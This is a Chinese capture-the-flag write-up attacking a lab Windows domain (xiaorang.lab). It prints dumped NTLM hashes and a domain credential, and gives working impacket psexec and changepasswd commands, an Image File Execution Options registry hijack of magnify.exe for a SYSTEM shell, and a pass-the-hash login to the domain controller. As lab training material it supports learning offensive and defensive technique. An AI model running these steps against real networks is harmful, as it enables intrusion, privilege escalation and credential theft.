flag01
fscan 扫一下。直接能扫到 1433 端口的密码:
命令直接上线就好了。
但是权限太低了。
sweetpotato 提权给 cs 上线:
flag02
看 flag 的时候发现还有个 john 用户。
没有明文密码,拿到 john 的 hash。
1
2
3
4
| Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf35bb4c5059a3d50599844e2b9b1f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1008:aad3b435b51404eeaad3b435b51404ee:eec9381b043f098b011be51622282027:::
|
查看当前登录用户。
可以注入进程上线。
存在共享文件
目录下有个credential.txt
说是要用镜像劫持。
1
| xiaorang.lab\Aldrich:Ald@rLMWuy7Z!
|
扫下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
| [2025-03-08 21:54:51] [INFO] 暴力破解线程数: 1
[2025-03-08 21:54:51] [INFO] 开始信息扫描
[2025-03-08 21:54:51] [INFO] CIDR范围: 172.22.8.0-172.22.8.255
[2025-03-08 21:54:51] [INFO] 生成IP范围: 172.22.8.0.%!d(string=172.22.8.255) - %!s(MISSING).%!d(MISSING)
[2025-03-08 21:54:51] [INFO] 解析CIDR 172.22.8.18/24 -> IP范围 172.22.8.0-172.22.8.255
[2025-03-08 21:54:51] [INFO] 已排除指定主机: 1 个
[2025-03-08 21:54:51] [INFO] 最终有效主机数量: 255
[2025-03-08 21:54:51] [INFO] 开始主机扫描
[2025-03-08 21:54:51] [SUCCESS] 目标 172.22.8.15 存活 (ICMP)
[2025-03-08 21:54:51] [SUCCESS] 目标 172.22.8.31 存活 (ICMP)
[2025-03-08 21:54:51] [SUCCESS] 目标 172.22.8.46 存活 (ICMP)
[2025-03-08 21:54:54] [INFO] 存活主机数量: 3
[2025-03-08 21:54:54] [INFO] 有效端口数量: 233
[2025-03-08 21:54:54] [SUCCESS] 端口开放 172.22.8.46:80
[2025-03-08 21:54:54] [SUCCESS] 端口开放 172.22.8.31:135
[2025-03-08 21:54:54] [SUCCESS] 端口开放 172.22.8.15:135
[2025-03-08 21:54:54] [SUCCESS] 端口开放 172.22.8.15:88
[2025-03-08 21:54:54] [SUCCESS] 端口开放 172.22.8.46:135
[2025-03-08 21:54:55] [SUCCESS] 端口开放 172.22.8.46:445
[2025-03-08 21:54:55] [SUCCESS] 端口开放 172.22.8.15:445
[2025-03-08 21:54:55] [SUCCESS] 端口开放 172.22.8.31:445
[2025-03-08 21:54:55] [SUCCESS] 端口开放 172.22.8.15:389
[2025-03-08 21:54:55] [SUCCESS] 端口开放 172.22.8.46:139
[2025-03-08 21:54:55] [SUCCESS] 端口开放 172.22.8.31:139
[2025-03-08 21:54:55] [SUCCESS] 端口开放 172.22.8.15:139
[2025-03-08 21:54:59] [SUCCESS] 服务识别 172.22.8.15:88 =>
[2025-03-08 21:54:59] [SUCCESS] 服务识别 172.22.8.46:80 => [http]
[2025-03-08 21:55:00] [SUCCESS] 服务识别 172.22.8.46:445 =>
[2025-03-08 21:55:00] [SUCCESS] 服务识别 172.22.8.15:445 =>
[2025-03-08 21:55:00] [SUCCESS] 服务识别 172.22.8.31:445 =>
[2025-03-08 21:55:00] [SUCCESS] 服务识别 172.22.8.46:139 => Banner:[.]
[2025-03-08 21:55:01] [SUCCESS] 服务识别 172.22.8.31:139 => Banner:[.]
[2025-03-08 21:55:01] [SUCCESS] 服务识别 172.22.8.15:139 => Banner:[.]
[2025-03-08 21:55:05] [SUCCESS] 服务识别 172.22.8.15:389 =>
[2025-03-08 21:55:59] [SUCCESS] 服务识别 172.22.8.31:135 =>
[2025-03-08 21:55:59] [SUCCESS] 服务识别 172.22.8.15:135 =>
[2025-03-08 21:56:00] [SUCCESS] 服务识别 172.22.8.46:135 =>
[2025-03-08 21:56:00] [INFO] 存活端口数量: 12
[2025-03-08 21:56:00] [INFO] 开始漏洞扫描
[2025-03-08 21:56:00] [INFO] 加载的插件: findnet, ldap, ms17010, netbios, smb, smb2, smbghost, webpoc, webtitle
[2025-03-08 21:56:00] [SUCCESS] 网站标题 http://172.22.8.46 状态码:200 长度:703 标题:IIS Windows Server
[2025-03-08 21:56:00] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.8.46
主机名: WIN2016
发现的网络接口:
IPv4地址:
└─ 172.22.8.46
[2025-03-08 21:56:00] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.8.31
主机名: WIN19-CLIENT
发现的网络接口:
IPv4地址:
└─ 172.22.8.31
[2025-03-08 21:56:00] [SUCCESS] NetBios 172.22.8.31 XIAORANG\WIN19-CLIENT
[2025-03-08 21:56:00] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.8.15
主机名: DC01
发现的网络接口:
IPv4地址:
└─ 172.22.8.15
[2025-03-08 21:56:00] [SUCCESS] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-03-08 21:56:00] [SUCCESS] NetBios 172.22.8.15 DC:XIAORANG\DC01
[2025-03-08 21:56:24] [SUCCESS] 扫描已完成: 23/23
|
先尝试一下登录,提示密码过期
1
| psexec.py xiaorang.lab/Aldrich@172.22.8.46
|
用 impacket 修改密码:
3.11 是 smbpasswd,3.12 得用 changepasswd
1
| changepasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass '123qwe!@#'
|
能用这个账号登录上172.22.8.46``xiaorang.lab\Aldrich:123qwe!@#注意如果这个反斜杠错了也是连不上的,卡了我半个小时。
连上之后用入口机器 shell 做个监听,让内网 stageless 连这个监听。
然后就是镜像劫持提权。
先查看权限:
1
| get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *
|
所有用户都能修改注册表。利用这个方式进行镜像劫持。将用户主页启动的放大镜magnify.exe切换成 C:\windows\system32\cmd.exe
1
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
|
锁屏然后用放大镜就拿到了 system 的 shell。然后运行下 shell 就行。
flag03
1
| shell net group "domain admins" /domain
|
发现 WIN2016$在域管组里面。logonpasswords 能拿到这台机器的 hash:
机器用户能直接拿到 hash,那直接 pth 登录 172.22.8.15就好了。
4aba68b2717db6dcf1db2b600b860bb4
1
| psexec.py -hashes ":4aba68b2717db6dcf1db2b600b860bb4" WIN2016$@172.22.8.15 -codec gbk
|
